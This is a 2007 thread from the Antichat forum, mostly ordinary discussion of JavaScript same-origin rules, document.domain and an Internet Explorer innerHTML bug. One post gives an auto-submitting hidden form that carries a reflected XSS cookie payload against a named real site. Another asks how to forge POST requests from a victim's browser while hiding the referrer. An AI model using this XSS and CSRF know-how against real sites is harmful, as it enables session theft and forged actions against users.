Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.11.2007, 00:37
|
|
Новичок
Регистрация: 14.07.2007
Сообщений: 29
Провел на форуме:
52130
Репутация:
10
|
|
Сообщение от astrologer
Нет, как раз JS действительно можно подключать с любого другого домена, но исполняться он будет в контексте безопасности именно той страницы, где он был "подключён". Односторонняя такая защита.
А я и не говорил, что нельзя подключать скрипты с других сайтов. Я говорил, что AJAX и хирургический доступ к фреймам в таком скрипте, который подключается, абсолютно исключены системой безопасности доступа к страницам. Как к доступу к страницам подключаемого, так и к которому подключаем.
Объясню.
Так как, исполняемый скрипт может брать страницы через Аякс со своего домена. Неужели браузеры позволят сайтам подключать сторонние скрипты и использовать то, что они подключают свои страницы? Тырить контент можно.
Почему не может брать страницы от сайта к которому подключается? Да потому, что злоумышленник на сайте которого храниться код может его переделать и загрузать страницы первичного сайта к себе на сайт.
В таком случае, в подключении сторонних кодов, AJAX и какой-либо доступ к фреймам исключены.
Последний раз редактировалось Loopy; 28.11.2007 в 00:41..
|
|
|
28.11.2007, 22:28
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Сообщение от Loopy
Неужели браузеры позволят сайтам подключать сторонние скрипты и использовать то, что они подключают свои страницы? Тырить контент можно.
Тырить контент? Кросс-доменные ограничения, запрещающие доступ к фрейму, в который загружена страница с другого домена, по-моему, нужны, чтобы обеспечивать безопасность веб-авторизации.
(Правда, есть одно исключение - (document.domain), но, думаю, это не в твоём случае.)
А контент забирают другими, менее изощренными методами.
Можно, сделать по-другому: написать серверный скрипт (на php, к примеру), разместить на своём домене и обращаться уже к нему, передавая в запросе адрес страницы, которую нужно получить. Скрипт на сервере без проблем должен получить всё, что нужно и отдать клиентскому скрипту.
Почему не может брать страницы от сайта к которому подключается?
Разве? На пальцах: есть два сайта с разными доменными именами - site1 и site2.
Если на site1 "подключить" JS с site2, то он будет работать в контексте безопасности site1 и может работать с фреймами с site1 и запрашивать страницы AJAX'ом с site1, но не сможет проделывать аналогичное с site2, site3, и т.д.
В таком случае, в подключении сторонних кодов, AJAX и какой-либо доступ к фреймам исключены.
P.S. Специально сейчас проверил ситуацию с внешним JS с другого домена, всё работает. Так что ищи ошибки в коде.
|
|
|
|
28.11.2007, 23:06
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136
Репутация:
4536
|
|
есть <select id='mda'></select>
добавляю document.getElementById('mda').innerHTML = '<option value="">123</option>';
почему это не работает в ИЕ?
p.s. меня не интересует как сделать по другому.
|
|
|
|
29.11.2007, 13:11
|
|
Новичок
Регистрация: 27.12.2005
Сообщений: 7
Провел на форуме:
10752
Репутация:
1
|
|
Post
Вопрос банальный..
Честно говоря все позабыл уже 2 года в нете не был..
Вообщем, как через URL передать POST ?
Или как с помощью Javascript передать POST, скажем
на страницу: http://site.ru/page.php , например,
a=1 , b=2 , c=3
Нужно сформировать в скрытом фрейме стороннего сайта POST ,
И еще тупой вопрос:
кнопка submit:
Код HTML:
<input type="submit" name="xxx1" value="Добавить" accesskey="s" />
че она передаст скрипту? какие переменные и т.п.? |
|
|
|
29.11.2007, 16:06
|
|
Новичок
Регистрация: 14.07.2007
Сообщений: 29
Провел на форуме:
52130
Репутация:
10
|
|
Сообщение от astrologer
Тырить контент?
Да, HTML-контент, к котором могут содержаться важные данные, предоставляемые авторизованным, к примеру, пользователям.
Попробовал и получилось? Приведи код, если не сложно..
|
|
|
|
29.11.2007, 16:21
|
|
Новичок
Регистрация: 14.07.2007
Сообщений: 29
Провел на форуме:
52130
Репутация:
10
|
|
astrologer
Блин, респект. Получается. Проблема была в том, что страница, которую хотел получить, назодилось в поддомене..
из поддомена загружается только от этого поддомена.. как загрузать от одного сайта но от другого поддомена? 
|
|
|
|
29.11.2007, 16:44
|
|
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941
Репутация:
2277
|
|
я делал так автоматический пост
Код HTML:
<form name="postform" action="http://rechitsa.by/index.php" method="POST">
<input type="hidden" name="search_string" size=20 value="><script>alert(document.cookie)</script>">
<input type="hidden" src="/images/search.gif" alt="Поиск"/></td></tr>
<select name="search_cat" type="hidden">
<option value="all">весь сайт</option>
<option value="articles">статьи</option>
<option value="news">новости</option>
</select>
</form>
<script>document.postform.submit();</script>
|
|
|
|
29.11.2007, 17:02
|
|
Новичок
Регистрация: 14.07.2007
Сообщений: 29
Провел на форуме:
52130
Репутация:
10
|
|
Сообщение от GreenBear
есть <select id='mda'></select>
добавляю document.getElementById('mda').innerHTML = '<option value="">123</option>';
почему это не работает в ИЕ?
p.s. меня не интересует как сделать по другому.
В ИЕ, чтобы иннерить нужно присутствия каких-нибудь символов между тегами в которые вставляем..
|
|
|
|
29.11.2007, 18:48
|
|
Постоянный
Регистрация: 30.08.2007
Сообщений: 773
Провел на форуме:
3069349
Репутация:
808
|
|
Сообщение от GreenBear
есть <select id='mda'></select>
добавляю document.getElementById('mda').innerHTML = '<option value="">123</option>';
почему это не работает в ИЕ?
p.s. меня не интересует как сделать по другому.
Потому, что это баг IE.
В ИЕ, чтобы иннерить нужно присутствия каких-нибудь символов между тегами в которые вставляем..
Нет.
как загружать от одного сайта но от другого поддомена?
Если два разных поддомена - то нельзя. Возможно тогда и только тогда, когда со страницы "sub.site.com" нужно получить доступ к "site.com". В этом случае можно установить document.domain = 'site.com' и работать с ним. Обратно в пределах одной сессии изменить уже нельзя.
|
|
|
|
30.11.2007, 18:46
|
|
Новичок
Регистрация: 27.12.2005
Сообщений: 7
Провел на форуме:
10752
Репутация:
1
|
|
Как скрыть рефа у юзера?
Через window.location или document.location - эт понятно... хотя у меня опера передает рефа любым путем, даже если создается поп-ап окно без адреса и т.п.
А если это будет POST запрос ???
Типа:
<form>
.....
</form>
<script>submit();</script>
Блин, ужо неделю ломаю голову...
Причем надо учесть, чтобы именно браузер жертвы отправил запрос, т.к. проверяется сессия или куки...
Мож кто знает лучше метод, как избавиться от рефа юзера в POST запросе ????
Последний раз редактировалось bot; 02.12.2007 в 02:34..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
